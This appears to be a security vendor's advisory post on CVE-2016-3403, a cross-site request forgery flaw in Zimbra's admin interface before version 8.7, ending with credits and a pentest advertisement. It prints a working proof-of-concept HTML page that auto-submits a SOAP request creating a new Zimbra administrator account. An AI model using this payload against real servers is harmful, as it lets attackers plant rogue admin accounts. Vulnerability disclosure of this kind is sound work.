In a major release made on January 11, 2017 it has now been asserted that all Zimbra versions prior to 8.7 is susceptible to a list of cross site request forgery vulnerabilities in its administrative interface.
Zimbra is a collaborative software suite and is a highly sophisticated platform that allows developers create an interface that supports group calendars, email and documents sharing with the help of Ajax web interface. A Zimbra interface is developed with the help of Zimbra Ajax Toolkit and can be incorporated with functionalities such as drag-and-drop items, and right-click menus.
The Vulnerability discussed in CVE-2016-3403 clearly defines the parameters that are affected and states that Zimbra is vulnerable to CSRF due to the missing CSRF token that identifies a valid session. This vulnerability creates a situation allowing attackers to forge requests and play it arbitrarily.
Proof of Concept
<html>
<body>
<form enctype="text/plain" id="trololo"
action="https://192.168.0.171:7071/service/admin/soap/CreateAccountRequest"
method="POST">
<input name='<soap:Envelope
xmlns:soap="http://www.w3.org/2003/05/soap-envelope"><soap:Header><context
xmlns="urn:zimbra"><userAgent xmlns="" name="DTC"/><session xmlns=""
id="1337"/><format xmlns=""
type="js"/></context></soap:Header><soap:Body><CreateAccountRequest
xmlns="urn:zimbraAdmin"><name xmlns="">itworks@ubuntu.fr</name><password
xmlns="">test1234</password><a xmlns=""
n="zimbraAccountStatus">active</a><a xmlns=""
n="displayName">ItWorks</a><a xmlns="" n'
value='"sn">itworks</a><a xmlns=""
n="zimbraIsAdminAccount">TRUE</a></CreateAccountRequest></soap:Body></soap:Envelope>'/>
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
The fixes of the vulnerability has been released by Zimbra and was made public. The aforesaid fixes are published in a “Defect Tracking System” called Bugzilla.
References for the fixes are as follows:
Vulnerabilities in the Zimbra Administration interface vulnerability was exposed by Anthony LAOU-HINE TSUEI and Damien CAUQUIL. The exposed vulnerabilities were then acknowledged by Zimbra and the fixes were made public in June 2016.
Don’t leave yourself exposed. Find your vulnerabilities before cybercriminals do. Contact us for Vulnerability Assessment and Penetration Testing.